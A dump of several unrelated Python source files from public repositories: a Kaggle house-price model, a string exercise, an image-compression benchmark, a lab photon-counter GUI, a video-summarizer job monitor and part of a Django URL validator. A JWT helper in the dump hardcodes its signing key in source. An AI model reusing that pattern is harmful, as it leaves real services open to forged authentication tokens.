train_data['GarageCars'] ** 2\r\ntrain_data['GarageCars-3'] = train_data['GarageCars'] ** 3\r\ntrain_data['GarageCars-Sq'] = np.sqrt(train_data['GarageCars'])\r\ntrain_data['TotalBath-2'] = train_data['TotalBath'] ** 2\r\ntrain_data['TotalBath-3'] = train_data['TotalBath'] ** 3\r\ntrain_data['TotalBath-Sq'] = np.sqrt(train_data['TotalBath'])\r\ntrain_data['KitchenQual-2'] = train_data['KitchenQual'] ** 2\r\ntrain_data['KitchenQual-3'] = train_data['KitchenQual'] ** 3\r\ntrain_data['KitchenQual-Sq'] = np.sqrt(train_data['KitchenQual'])\r\ntrain_data['GarageScore-2'] = train_data['GarageScore'] ** 2\r\ntrain_data['GarageScore-3'] = train_data['GarageScore'] ** 3\r\ntrain_data['GarageScore-Sq'] = np.sqrt(train_data['GarageScore'])\r\ntest_data['OverallQual-s2'] = test_data['OverallQual'] ** 2\r\ntest_data['OverallQual-s3'] = test_data['OverallQual'] ** 3\r\ntest_data['OverallQual-Sq'] = np.sqrt(test_data['OverallQual'])\r\ntest_data['AllSF-2'] = test_data['AllSF'] ** 2\r\ntest_data['AllSF-3'] = test_data['AllSF'] ** 3\r\ntest_data['AllSF-Sq'] = np.sqrt(test_data['AllSF'])\r\ntest_data['AllFlrsSF-2'] = test_data['AllFlrsSF'] ** 2\r\ntest_data['AllFlrsSF-3'] = test_data['AllFlrsSF'] ** 3\r\ntest_data['AllFlrsSF-Sq'] = np.sqrt(test_data['AllFlrsSF'])\r\ntest_data['GrLivArea-2'] = test_data['GrLivArea'] ** 2\r\ntest_data['GrLivArea-3'] = test_data['GrLivArea'] ** 3\r\ntest_data['GrLivArea-Sq'] = np.sqrt(test_data['GrLivArea'])\r\ntest_data['SimplOverallQual-s2'] = test_data['SimplOverallQual'] ** 2\r\ntest_data['SimplOverallQual-s3'] = test_data['SimplOverallQual'] ** 3\r\ntest_data['SimplOverallQual-Sq'] = np.sqrt(test_data['SimplOverallQual'])\r\ntest_data['ExterQual-2'] = test_data['ExterQual'] ** 2\r\ntest_data['ExterQual-3'] = test_data['ExterQual'] ** 3\r\ntest_data['ExterQual-Sq'] = np.sqrt(test_data['ExterQual'])\r\ntest_data['GarageCars-2'] = test_data['GarageCars'] ** 2\r\ntest_data['GarageCars-3'] = test_data['GarageCars'] ** 3\r\ntest_data['GarageCars-Sq'] = np.sqrt(test_data['GarageCars'])\r\ntest_data['TotalBath-2'] = test_data['TotalBath'] ** 2\r\ntest_data['TotalBath-3'] = test_data['TotalBath'] ** 3\r\ntest_data['TotalBath-Sq'] = np.sqrt(test_data['TotalBath'])\r\ntest_data['KitchenQual-2'] = test_data['KitchenQual'] ** 2\r\ntest_data['KitchenQual-3'] = test_data['KitchenQual'] ** 3\r\ntest_data['KitchenQual-Sq'] = np.sqrt(test_data['KitchenQual'])\r\ntest_data['GarageScore-2'] = test_data['GarageScore'] ** 2\r\ntest_data['GarageScore-3'] = test_data['GarageScore'] ** 3\r\ntest_data['GarageScore-Sq'] = np.sqrt(test_data['GarageScore'])\r\n\r\n\r\n################################################### 特征丢弃 #############################################################\r\n\r\ntest_data = test_data.drop(['Alley'], axis=1)\r\ntrain_data = train_data.drop(['Alley'], axis=1)\r\ntest_data = test_data.drop(['Utilities'], axis=1)\r\ntrain_data = train_data.drop(['Utilities'], axis=1)\r\ntest_data = test_data.drop(['PoolArea'], axis=1)\r\ntrain_data = train_data.drop(['PoolArea'], axis=1)\r\n\r\n\r\n\r\n# 因为test中没有\"GrLivArea\" > 4000的,所以可以删掉,以防过拟合\r\ntrain_data.drop(train_data[train_data[\"GrLivArea\"] > 4000].index, inplace=True)\r\n\r\n\r\n################################################### 使用log1p #############################################################\r\n\r\n'''\r\nfeats = train_data.columns.difference(['Id','SalePrice'])\r\nfrom scipy.stats import skew, skewtest\r\nall_data = pd.concat((train_data.loc[:,feats], test_data.loc[:,feats]))\r\nnumeric_feats = all_data.dtypes[all_data.dtypes != \"object\"].index\r\nskewed_feats = train_data[numeric_feats].apply(lambda x: skew(x.dropna())) \r\nskewed_feats = skewed_feats[skewed_feats > 0.75]\r\nskewed_feats = skewed_feats.index\r\n\r\nprint(skewed_feats)\r\n\r\ntrain_data[skewed_feats] = np.log1p(train_data[skewed_feats])\r\ntest_data[skewed_feats] = np.log1p(test_data[skewed_feats])\r\n'''\r\n\r\n\r\n############################################ 对类型特征编码 #############################################################\r\n\r\nfor cols in train_data.columns:\r\n if train_data[cols].dtype == np.object:\r\n train_data = pd.concat((train_data, pd.get_dummies(train_data[cols], prefix=cols)), axis=1)\r\n del train_data[cols]\r\n\r\nfor cols in test_data.columns:\r\n if test_data[cols].dtype == np.object:\r\n test_data = pd.concat((test_data, pd.get_dummies(test_data[cols], prefix=cols)), axis=1)\r\n del test_data[cols] \r\n\r\n\r\n\r\n################################################### 特征对齐 #############################################################\r\n\r\n#特征对其时会将train_set中SalePrice,'Id'删去,所以先保留\r\ntrain_y = np.log1p(train_data['SalePrice'])\r\n\r\n\r\n# 保证两边不会有不同时存在的特征\r\ncol_train = train_data.columns\r\ncol_test = test_data.columns\r\nfor index in col_train:\r\n if index in col_test:\r\n pass\r\n else:\r\n del train_data[index]\r\n\r\ncol_train = train_data.columns\r\ncol_test = test_data.columns\r\nfor index in col_test:\r\n if index in col_train:\r\n pass\r\n else:\r\n del test_data[index] \r\n\r\n\r\n################################################### 特征重要性排序 #############################################################\r\n\r\n\r\n\"\"\" RF特征重要性选择 \"\"\"\r\n'''\r\netr = RandomForestRegressor(n_estimators = 400)\r\ntrain_x = train_data\r\netr.fit(train_x, train_y)\r\nimp = etr.feature_importances_\r\nprint('###############################')\r\nprint(imp)\r\nprint(etr.n_features_)\r\nimp = pd.DataFrame({'feature': train_x.columns, 'score': imp})\r\nimp = imp.sort_values(['score'], ascending=[0])\r\nprint('###############################')\r\nprint(imp)\r\n'''\r\n# GBDT特征重要性选择\r\ngbdt = GradientBoostingRegressor(\r\n random_state=1,\r\n learning_rate=0.015, \r\n min_samples_split=2,\r\n max_features='sqrt', # 分裂的feature是随机挑选的\r\n n_estimators=100,\r\n min_samples_leaf=1,\r\n subsample=0.2,\r\n max_depth=3,\r\n )\r\ntrain_x = train_data\r\ngbdt.fit(train_x, train_y)\r\nimp = gbdt.feature_importances_\r\nimp = pd.DataFrame({'feature': train_x.columns, 'score': imp})\r\nimp = imp.sort_values(['score'], ascending=[0])\r\n#bivariate analysis saleprice/grlivarea \r\n#imp[['feature','score']].plot(kind='bar', stacked=True) \r\n\r\n\r\n\r\n\r\n################################################### 训练和输出结果 #############################################################\r\n\r\n\r\n################################ 准备数据 ################################\r\nselect_feature = imp['feature'][:75]\r\nxtrain_feature = train_x.loc[:,select_feature]\r\nxtest_feature = test_data.loc[:,select_feature]\r\n\r\n\r\n################################ 分类器一 ################################\r\n\r\n# Xgboost\r\nregr = xgb.XGBRegressor(\r\n colsample_bytree=0.2,\r\n gamma=0.0,\r\n learning_rate=0.05,\r\n max_depth=6,\r\n min_child_weight=1.5,\r\n n_estimators=7200, \r\n reg_alpha=0.9,\r\n reg_lambda=0.6,\r\n subsample=0.2,\r\n seed=42,\r\n silent=0)\r\n\r\nregr.fit(xtrain_feature, train_y)\r\ny_pred = regr.predict(xtrain_feature)\r\ny_test = train_y\r\nprint(\"XGBoost score on training set: \", rmse(y_test, y_pred))\r\ny_pred_xgb = regr.predict(xtest_feature)\r\n\r\n\r\n################################ 分类器二 ################################\r\n\r\n# 2* Ridge\r\nridge = RidgeCV(alphas = [0.01, 0.03, 0.06, 0.1, 0.3, 0.6, 1, 3, 6, 10, 30, 24])\r\nridge.fit(xtrain_feature, train_y)\r\nalpha = ridge.alpha_\r\nprint(\"Best alpha :\", alpha)\r\nridge = RidgeCV(alphas = [alpha * .6, alpha * .65, alpha * .7, alpha * .75, alpha * .8, alpha * .85, \r\n alpha * .9, alpha * .95, alpha, alpha * 1.05, alpha * 1.1, alpha * 1.15,\r\n alpha * 1.25, alpha * 1.3, alpha * 1.35, alpha * 1.4], \r\n cv = 10)\r\nridge.fit(xtrain_feature, train_y)\r\nalpha = ridge.alpha_\r\nprint(\"Best alpha :\", alpha)\r\ny_test = train_y\r\ny_pred = ridge.predict(xtrain_feature)\r\nprint(\"Ridge RMSE score on training set: \", rmse(y_test, y_pred))\r\ny_test_rdg = ridge.predict(xtest_feature)\r\n\r\n\r\n################################ 分类器三 ################################\r\n\r\n# Lasso\r\n'''\r\n部分测试结果:\r\nbest_alpha = 0.00099, 0.12906\r\nbest_alpha = 0.00097, 0.12888\r\nbest_alpha = 0.00096, 0.12775\r\n\r\n'''\r\nbest_alpha = 0.00096\r\nregr = Lasso(alpha=best_alpha, max_iter=50000)\r\nregr.fit(xtrain_feature, train_y)\r\ny_pred = regr.predict(xtrain_feature)\r\ny_test = train_y\r\nprint(\"Lasso score on training set: \", rmse(y_test, y_pred))\r\ny_pred_lasso = regr.predict(xtest_feature)\r\n\r\n\r\n################################ 分类器四 ################################\r\n\r\n# 4* ElasticNet\r\nelasticNet = ElasticNetCV(l1_ratio = [0.1, 0.3, 0.5, 0.6, 0.7, 0.8, 0.85, 0.9, 0.95, 1],\r\n alphas = [0.0001, 0.0003, 0.0006, 0.001, 0.003, 0.006, \r\n 0.01, 0.03, 0.06, 0.1, 0.3, 0.6, 1, 3, 6], \r\n max_iter = 50000, cv = 10)\r\nelasticNet.fit(xtrain_feature, train_y)\r\nalpha = elasticNet.alpha_\r\nratio = elasticNet.l1_ratio_\r\nprint(\"Best l1_ratio :\", ratio)\r\nprint(\"Best alpha :\", alpha )\r\n\r\ny_test = elasticNet.predict(xtrain_feature)\r\nprint(\"ela score on training set: \", rmse(y_test, y_pred))\r\ny_test_ela = elasticNet.predict(xtest_feature)\r\n\r\n\r\n################################ 糅合结果 ################################\r\n\r\n# 根据前面四个分类器的预测得到结果\r\n# y_pred_xgb, y_test_ela,y_pred_lasso ,y_test_rdg\r\nsubm = pd.read_csv(\"../input/sample_submission.csv\")\r\nsubm.iloc[:,1] = np.array(np.expm1(y_pred_xgb))\r\nsubm.to_csv('../log1p_xgb.csv', index=None)\r\nsubm.iloc[:,1] = np.array(np.expm1(y_test_ela))\r\nsubm.to_csv('../log1p_ela.csv', index=None)\r\nsubm.iloc[:,1] = np.array(np.expm1(y_pred_lasso))\r\nsubm.to_csv('../log1p_lasso.csv', index=None)\r\nsubm.iloc[:,1] = np.array(np.expm1(y_test_rdg))\r\nsubm.to_csv('../log1p_rgd.csv', index=None)\r\n\r\ny_pred = (y_pred_xgb + y_test_ela )/2; # 此语句可修改,这里留下的是准确率最高的组合\r\nsubm.iloc[:,1] = np.array(np.expm1(y_pred))\r\nsubm.to_csv('../log1p_xgb_ela.csv', index=None)\r\n","repo_name":"zht96pi/KaggleHousePrice","sub_path":"Kaggle_House_Price.py","file_name":"Kaggle_House_Price.py","file_ext":"py","file_size_in_byte":39022,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"71045738027","text":"'''\nWrite a Python program to remove words from a given list of strings containing a character or string.\nOriginal list:\nlist1: ['Red color', 'Orange#', 'Green', 'Orange @', 'White']\nCharacter list:\n['#', 'color', '@']\nNew list:\n['Red', '', 'Green', 'Orange', 'White']\n'''\n\nlst = ['Red color', 'Orange#', 'Green', 'Orange @', 'White']\nrep = ['#', 'color', '@']\n\n\ndef string_replacement(st,rep):\n res = []\n for i in lst:\n element_level = []\n for j in i.split(' '):\n x = j\n for k in rep:\n x = '' if x.find(k)!=-1 else x\n element_level.append(x.strip())\n res.append(' '.join(element_level))\n return res\n\nprint(string_replacement(lst,rep))","repo_name":"Tashish97/Data-Science","sub_path":"Python_Practice/Lists/q77.py","file_name":"q77.py","file_ext":"py","file_size_in_byte":713,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"39692470664","text":"# pip install pytransloadit\n# pip install python-decouple\nfrom fileinput import filename\nimport pathlib\nfrom transloadit import client\nfrom decouple import config\nimport csv\n\n# Create a .env file with these values for your account\nAUTH_KEY = config('AUTH_KEY')\nAUTH_SECRET = config('AUTH_SECRET')\n\ntl = client.Transloadit(AUTH_KEY, AUTH_SECRET)\n\nqualities = {25, 50, 75, 100}\nimages = {\n 'test0.webp', \n 'test1.jpg', \n 'test2.jpg', \n 'test3.png', \n 'test4.png', \n 'test5.jpg',\n 'test6.jpg',\n 'test7.gif',\n 'test8.svg',\n 'test9.gif',\n 'test10.webp',\n 'test10.svg',\n}\nFILENAME = 'quality.csv'\n\n# Write columns of CSV\nwith open(FILENAME, mode='w') as columns:\n column_writer = csv.writer(\n columns, delimiter=',', quotechar='\"', quoting=csv.QUOTE_MINIMAL)\n column_writer.writerow(['Image', 'Input Size (MB)', 'Output Size (MB)', 'Execution Time (s)',\n 'Input Format', 'Output Format', 'Quality'])\n\n\ndef write_to_csv(image, quality, assembly_response):\n print(assembly_response.data)\n input_size = assembly_response.data['uploads'][0]['size'] / 1000000\n output_size = assembly_response.data['results']['format'][0]['size'] / 1000000\n execution_time = assembly_response.data['execution_duration']\n input_format = pathlib.Path(image).suffix\n output_format = assembly_response.data['results']['format'][0]['ext']\n\n with open(FILENAME, mode='a') as data:\n data_writer = csv.writer(\n data, delimiter=',', quotechar='\"', quoting=csv.QUOTE_MINIMAL)\n data_writer.writerow([image, input_size, output_size, execution_time, input_format,\n output_format, quality])\n\n\ncount = 0\nfor image in images:\n for quality in qualities:\n assembly = tl.new_assembly()\n\n # Set Encoding Instructions\n assembly.add_step('format', '/image/resize', {\n 'use': ':original',\n 'format': 'jpg',\n 'quality': quality\n })\n\n # Add files to upload\n assembly.add_file(open(image, 'rb'))\n\n # Start the Assembly\n assembly_response = assembly.create(retries=5, wait=True)\n\n write_to_csv(image, quality, assembly_response)\n count += 1\n print(count)\n","repo_name":"Missing-Tech/OptimizeTester","sub_path":"quality.py","file_name":"quality.py","file_ext":"py","file_size_in_byte":2265,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"18244616630","text":"import jwt\nimport time\n\ndef make_token(data):\n key = \"895BC687BB08374C1963CFA2DEEF1F7E60A75B76DB4F4FF4D5AA2C2A3BF78891\"\n now = time.time()\n expiretime = 60 * 60\n payload = {\n \"username\": data.username,\n \"expire\": now + expiretime\n }\n return jwt.encode(payload,key,algorithm = 'HS256')\n","repo_name":"daniel2012600/shop_learning","sub_path":"backend/keyboardmarket/tools/token.py","file_name":"token.py","file_ext":"py","file_size_in_byte":317,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"845478581","text":"import numpy as np\nimport cPickle\n\n# enthought library imports\nfrom traits.api import SingletonHasTraits, HasTraits, Trait, Instance, Property, Int, Float, Range,\\\n Bool, Array, String, Str, Enum, Button, Tuple, List, on_trait_change,\\\n cached_property, DelegatesTo, Font\nfrom traitsui.api import View, Item, Group, HGroup, VGroup, VSplit, Tabbed, EnumEditor\n\nfrom traitsui.file_dialog import save_file\nfrom traitsui.menu import Action, Menu, MenuBar\n\nfrom enable.api import ComponentEditor, Component\nfrom chaco.api import Plot, ScatterPlot, CMapImagePlot, ArrayPlotData,\\\n Spectral, ColorBar, LinearMapper, DataView,\\\n LinePlot, ArrayDataSource, HPlotContainer, hot\n#from chaco.tools.api import ZoomTool\nfrom chaco.tools.cursor_tool import CursorTool, BaseCursorTool\n\nfrom tools.utility import GetSetItemsHandler, GetSetItemsMixin\n\nimport threading\nimport time\n\nfrom tools.emod import Job\nfrom tools.color import scheme\n\nclass StartThreadHandler( GetSetItemsHandler ):\n\n def init(self, info):\n info.object.start()\n \nclass PhotonTimeTrace( Job, GetSetItemsMixin ):\n\n TraceLength = Range(low=10, high=10000, value=1000, desc='Length of Count Trace', label='Trace Length')\n SecondsPerPoint = Range(low=0.001, high=1, value=0.05, desc='Seconds per point [s]', label='Seconds per point [s]')\n RefreshRate = Range(low=0.01, high=1, value=0.1, desc='Refresh rate [s]', label='Refresh rate [s]')\n\n # trace data\n C0 = Array()\n C1 = Array()\n C0C1 = Array()\n T = Array()\n \n counts = Float(0.0)\n throttle = 0\n throttle_level = 2\n \n c_enable0 = Bool(False, label='channel 0', desc='enable channel 0')\n c_enable1 = Bool(False, label='channel 1', desc='enable channel 1')\n sum_enable = Bool(True, label='c0 + c1', desc='enable sum c0 + c1')\n \n baseline = Bool(True, label='baseline', desc='show baseline')\n \n TracePlot = Instance( Plot )\n TraceData = Instance( ArrayPlotData )\n \n digits_data = Instance( ArrayPlotData )\n digits_plot = Instance( Plot )\n \n \n def __init__(self, time_tagger, **kwargs):\n super(PhotonTimeTrace, self).__init__(**kwargs)\n self.time_tagger = time_tagger\n self.on_trait_change(self._update_T, 'T', dispatch='ui')\n self.on_trait_change(self._update_C0, 'C0', dispatch='ui')\n self.on_trait_change(self._update_C1, 'C1', dispatch='ui')\n self.on_trait_change(self._update_C0C1, 'C0C1', dispatch='ui')\n self._create_counter()\n \n self._create_digits_plot()\n self.update_digits_plot()\n\n def _create_counter(self):\n self._counter0 = self.time_tagger.Counter(0, int(self.SecondsPerPoint*1e12), self.TraceLength) \n self._counter1 = self.time_tagger.Counter(1, int(self.SecondsPerPoint*1e12), self.TraceLength) \n \n def _C0_default(self):\n return np.zeros((self.TraceLength,)) \n \n def _C1_default(self):\n return np.zeros((self.TraceLength,))\n \n def _C0C1_default(self):\n return np.zeros((self.TraceLength,))\n \n def _counts_default(self):\n return 0\n \n def _T_default(self):\n return self.SecondsPerPoint*np.arange(self.TraceLength)\n\n def _update_T(self):\n self.TraceData.set_data('t', self.T)\n\n def _update_C0(self):\n self.TraceData.set_data('y0', self.C0)\n #self.TracePlot.request_redraw()\n\n def _update_C1(self):\n self.TraceData.set_data('y1', self.C1)\n #self.TracePlot.request_redraw()\n \n def _update_C0C1(self):\n self.TraceData.set_data('y8', self.C0C1)\n #self.TracePlot.request_redraw()\n\n def _TraceLength_changed(self):\n self.C0 = self._C0_default()\n self.C1 = self._C1_default()\n self.C0C1 = self._C0C1_default()\n self.T = self._T_default()\n self._create_counter()\n \n def _SecondsPerPoint_changed(self):\n self.T = self._T_default()\n self._create_counter()\n\n def _TraceData_default(self):\n return ArrayPlotData(t=self.T, y0=self.C0, y1=self.C1, y8=self.C0C1)\n \n def _TracePlot_default(self):\n plot = Plot(self.TraceData, width=500, height=500, resizable='hv')\n plot.plot(('t','y8'), type='line', line_style='solid', color=0xFFFFFF, line_width=2, render_style='connectedpoints', name='ch0 & ch1')\n plot.bgcolor = scheme['background']\n plot.value_range.low = 0.0\n plot.x_grid = None\n plot.y_grid = None\n return plot\n \n @on_trait_change('baseline,c_enable0,c_enable1,sum_enable')\n def _replot(self):\n \n self.TracePlot = Plot(self.TraceData, width=500, height=500, resizable='hv')\n if self.baseline:\n self.TracePlot.value_range.low = 0.0\n if not self.baseline:\n self.TracePlot.value_range.low = 'auto'\n self.TracePlot.legend.align = 'll'\n self.TracePlot.bgcolor = scheme['background']\n self.TracePlot.x_grid = None\n self.TracePlot.y_grid = None\n \n n=0\n if self.c_enable0:\n self.TracePlot.plot(('t','y0'), type='line', line_style='solid', color=scheme['data 1'], line_width=2, render_style='connectedpoints', name='channel 0')\n n+=1\n if self.c_enable1:\n self.TracePlot.plot(('t','y1'), type='line', line_style='solid', color=scheme['data 2'], line_width=2, render_style='connectedpoints', name='channel 1')\n n+=1\n if self.sum_enable:\n self.TracePlot.plot(('t','y8'), type='line', line_style='solid', color=0xFFFFFF, line_width=2, render_style='connectedpoints', name='ch0 & ch1')\n n+=1\n if n > 3:\n self.TracePlot.legend.visible = True\n else:\n self.TracePlot.legend.visible = False\n \n def _baseline_changed(self):\n if self.baseline:\n self.TracePlot.value_range.low = 0.0\n if not self.baseline:\n self.TracePlot.value_range.low = 'auto'\n \n def _run(self):\n \"\"\"Acquire Count Trace\"\"\"\n while True:\n threading.current_thread().stop_request.wait(self.RefreshRate)\n if threading.current_thread().stop_request.isSet():\n break\n self.C0 = self._counter0.getData() / self.SecondsPerPoint / 1000.0 # kcounts / s\n self.C1 = self._counter1.getData() / self.SecondsPerPoint / 1000.0 # kcounts / s\n self.C0C1 = self.C0 + self.C1\n self.throttle = (self.throttle + 1) % self.throttle_level\n if self.throttle == 0:\n self.counts = self.C0C1[-1]\n \n \n # DIGITS PLOT\n def _create_digits_plot(self):\n data = ArrayPlotData(image=np.zeros((2,2)))\n plot = Plot(data, width=500, height=500, resizable='hv', aspect_ratio=37.0/9, padding=8, padding_left=48, padding_bottom=36)\n plot.img_plot('image',\n xbounds=(0, 1),\n ybounds=(0, 1),\n colormap=hot)\n plot.plots['plot0'][0].value_range.high_setting = 1\n plot.plots['plot0'][0].value_range.low_setting = 0\n plot.x_axis = None\n plot.y_axis = None\n self.digits_data = data\n self.digits_plot = plot\n \n @on_trait_change('counts')\n def update_digits_plot(self):\n string = ('%5.1f' % self.counts)[:5] + 'k'\n \n data = np.zeros((37,9))\n for i, char in enumerate(string):\n data[6*i+1:6*i+6,1:-1] = DIGIT[char].transpose()\n if self.counts >= 2e3:\n data *= 0.4\n self.digits_data.set_data('image', data.transpose()[::-1])\n \n \n traits_view = View( VGroup(VSplit(Item('TracePlot', editor=ComponentEditor(), show_label=False),\n Item('digits_plot', editor=ComponentEditor(), show_label=False)),\n #VGroup(Item('c_enable0'),Item('c_enable1'),Item('c_enable2'),Item('c_enable3'),Item('c_enable4'),Item('c_enable5'),Item('c_enable6'),Item('c_enable7'),Item('sum_enable'))\n HGroup(Item('c_enable0'),Item('c_enable1'),Item('sum_enable'),Item('baseline'))\n ),\n Item('TraceLength'),\n Item ('SecondsPerPoint'),\n Item ('RefreshRate'),\n title='Counter',\n width=895,\n height=1200,\n buttons=[],\n resizable=True,\n x=1025,\n y=0,\n handler=StartThreadHandler\n )\n \nDIGIT = {}\nDIGIT['0'] = np.array([0,1,1,1,0,\n 1,0,0,0,1,\n 1,0,0,1,1,\n 1,0,1,0,1,\n 1,1,0,0,1,\n 1,0,0,0,1,\n 0,1,1,1,0]).reshape(7,5)\nDIGIT['1'] = np.array([0,0,1,0,0,\n 0,1,1,0,0,\n 1,0,1,0,0,\n 0,0,1,0,0,\n 0,0,1,0,0,\n 0,0,1,0,0,\n 1,1,1,1,1]).reshape(7,5)\nDIGIT['2'] = np.array([0,1,1,1,0,\n 1,0,0,0,1,\n 0,0,0,0,1,\n 0,0,0,1,0,\n 0,0,1,0,0,\n 0,1,0,0,0,\n 1,1,1,1,1]).reshape(7,5)\nDIGIT['3'] = np.array([0,1,1,1,0,\n 1,0,0,0,1,\n 0,0,0,0,1,\n 0,0,0,1,0,\n 0,0,0,0,1,\n 1,0,0,0,1,\n 0,1,1,1,0]).reshape(7,5)\nDIGIT['4'] = np.array([0,0,1,0,0,\n 0,1,0,0,0,\n 0,1,0,0,0,\n 1,0,0,1,0,\n 1,1,1,1,1,\n 0,0,0,1,0,\n 0,0,0,1,0]).reshape(7,5)\nDIGIT['5'] = np.array([1,1,1,1,1,\n 1,0,0,0,0,\n 1,0,0,0,0,\n 1,1,1,1,0,\n 0,0,0,0,1,\n 1,0,0,0,1,\n 0,1,1,1,0]).reshape(7,5)\nDIGIT['6'] = np.array([0,1,1,1,0,\n 1,0,0,0,1,\n 1,0,0,0,0,\n 1,1,1,1,0,\n 1,0,0,0,1,\n 1,0,0,0,1,\n 0,1,1,1,0]).reshape(7,5)\nDIGIT['7'] = np.array([1,1,1,1,1,\n 0,0,0,0,1,\n 0,0,0,0,1,\n 0,0,0,1,0,\n 0,0,1,0,0,\n 0,1,0,0,0,\n 1,0,0,0,0]).reshape(7,5)\nDIGIT['8'] = np.array([0,1,1,1,0,\n 1,0,0,0,1,\n 1,0,0,0,1,\n 0,1,1,1,0,\n 1,0,0,0,1,\n 1,0,0,0,1,\n 0,1,1,1,0]).reshape(7,5)\nDIGIT['9'] = np.array([0,1,1,1,0,\n 1,0,0,0,1,\n 1,0,0,0,1,\n 0,1,1,1,1,\n 0,0,0,0,1,\n 1,0,0,0,1,\n 0,1,1,1,0]).reshape(7,5)\nDIGIT['.'] = np.array([0,0,0,0,0,\n 0,0,0,0,0,\n 0,0,0,0,0,\n 0,0,0,0,0,\n 0,0,0,0,0,\n 0,0,0,0,0,\n 0,0,1,0,0]).reshape(7,5)\nDIGIT['k'] = np.array([1,0,0,0,0,\n 1,0,0,0,0,\n 1,0,0,0,1,\n 1,0,0,1,0,\n 1,0,1,0,0,\n 1,1,0,1,0,\n 1,0,0,0,1]).reshape(7,5)\nDIGIT[' '] = np.array([0,0,0,0,0,\n 0,0,0,0,0,\n 0,0,0,0,0,\n 0,0,0,0,0,\n 0,0,0,0,0,\n 0,0,0,0,0,\n 0,0,0,0,0]).reshape(7,5)\n\nif __name__=='__main__':\n pass","repo_name":"Faridelnik/Pi3Diamond","sub_path":"measurements/photon_time_trace.py","file_name":"photon_time_trace.py","file_ext":"py","file_size_in_byte":12084,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"17868151036","text":"import logging\nfrom logging import Formatter, getLogger, StreamHandler\nfrom concurrent.futures import ProcessPoolExecutor\nimport asyncio\nimport os\nfrom time import sleep\n\nfrom langserve import RemoteRunnable\nimport httpx\nfrom src.backend import store_data_job\nfrom src.backend.configurations import ServiceConfigurations, CacheConfigurations\nfrom dotenv import load_dotenv\n\nload_dotenv()\n\n\n\n\nlog_format = Formatter(\"[%(asctime)s] [%(levelname)s] [%(process)d] [%(name)s] [%(funcName)s] [%(lineno)d] %(message)s\",\n datefmt='%d/%b/%Y:%H:%M:%S (%Z)'\n )\nlogger = getLogger('monitor')\nstdout_handler = StreamHandler()\nstdout_handler.setFormatter(log_format)\nlogger.addHandler(stdout_handler)\nlogger.setLevel(logging.DEBUG)\n\n# fileConfig('logging.conf')\n# logger = logging.getLogger('endpoint')\n\n\n\ntranscriber_service_url = ServiceConfigurations.services.get('transcriber', 'http://transcriber:5000') + '/transcribe/'\nsummarizer_service_url = ServiceConfigurations.services.get('summarizer', 'http://summarizer:6000') + '/summarize/'\n\nmapreduce_chain = RemoteRunnable(summarizer_service_url)\n\n\nlogger.debug(f'transcriber service url : {transcriber_service_url}')\nlogger.debug(f'summarizer service url : {summarizer_service_url}')\nsummary_dir = str(os.getenv('SUMMARY_PATH', 'summaries'))\nlogger.debug(f'summary will be stored in : {summary_dir}')\n\ndef _trigger_prediction_if_queue(transcriber_url : str, summarizer_service_url : str) :\n job_id = store_data_job.right_pop_queue(CacheConfigurations.queue_name)\n if job_id is not None :\n\n url = store_data_job.get_data_redis(job_id)\n logger.debug(f'pop a job [{job_id}] to process from redis queue')\n\n # call transcriber endpoint\n try :\n transcriber_response = httpx.post(transcriber_url,\n headers = {'Content-Type' : 'application/json'},\n params = {'url' : url, 'job_id' : job_id},\n timeout = None)\n except : # \n logger.debug(f'error occurs at transcription api.')\n\n logger.debug(f'job_id[{job_id}] has been sent to [transcriber].')\n transcription_json = transcriber_response.json()\n \n transcription_path = transcription_json['transcription_path']\n video_id = transcription_json['video_id']\n\n logger.debug(f'job_id[{job_id}] received response from [transcriber].')\n\n\n summary_path = f'{summary_dir}/{video_id}_summary.txt'\n\n \n logger.debug(f'job_id[{job_id}] has been sent to [summarizer].')\n \n try :\n summary_response = httpx.post(summarizer_service_url,\n headers = {'Content-Type' : 'application/json'},\n params = {'job_id' : job_id,\n 'transcript_path' : str(transcription_path),\n 'summary_path' : str(summary_path)\n },\n timeout = None\n )\n except :\n logger.debug(f'error occurs at summary api.')\n\n logger.debug(f'job_id[{job_id}] received response from [summarizer]')\n logger.debug(f'summary response : {summary_response}')\n\n\n\n summary = summary_response.json()['summary']\n logger.debug(f'job_id[{job_id}][summarizer response] : {summary}')\n store_data_job.set_data_redis(job_id, summary)\n\n \n\n\n\n\ndef _loop() :\n # send job request to transcriber & summarizer\n while True :\n sleep(1)\n _trigger_prediction_if_queue(transcriber_service_url, summarizer_service_url)\n \n\n\ndef monitoring_loop(num_procs : int = 4) :\n executor = ProcessPoolExecutor(num_procs)\n loop = asyncio.get_event_loop()\n\n for _ in range(num_procs) :\n asyncio.ensure_future(loop.run_in_executor(executor, _loop))\n\n loop.run_forever()\n\ndef main() :\n NUM_PROCS = int(os.getenv('NUM_PROCS', 1))\n logger.debug(f'monitoring runs {NUM_PROCS} processes.')\n monitoring_loop(NUM_PROCS)\n\nif __name__ == '__main__' :\n logger.info('start monitoring')\n main()","repo_name":"watanka/langchain-youtube-video-summarizer","sub_path":"src/backend/monitor.py","file_name":"monitor.py","file_ext":"py","file_size_in_byte":4248,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"6262969265","text":"import keyword\n\nfrom django.conf.urls.i18n import is_language_prefix_patterns_used\nfrom django.core import validators\nfrom django.core.exceptions import ValidationError\nfrom django.http import Http404\nfrom django.urls import get_urlconf, resolve\nfrom django.utils.translation import get_language, get_language_from_path\nfrom django.utils.translation import gettext_lazy as _\nfrom django.utils.translation import override\n\nfrom oscar.core.loading import get_model\n\n\nclass ExtendedURLValidator(validators.URLValidator):\n def __init__(self, *args, **kwargs):\n self.is_local_url = False\n super().__init__(*args, **kwargs)\n\n def __call__(self, value):\n try:\n super().__call__(value)\n except ValidationError:\n # The parent validator will raise an exception if the URL is not a\n # valid absolute URL so we test here to see if it is a local URL.\n if value:\n self.validate_local_url(value)\n else:\n raise\n\n def _validate_url(self, value):\n try:\n resolve(value)\n except Http404:\n # We load flatpages here as it causes a circular reference problem\n # sometimes. FlatPages is None if not installed\n FlatPage = get_model(\"flatpages\", 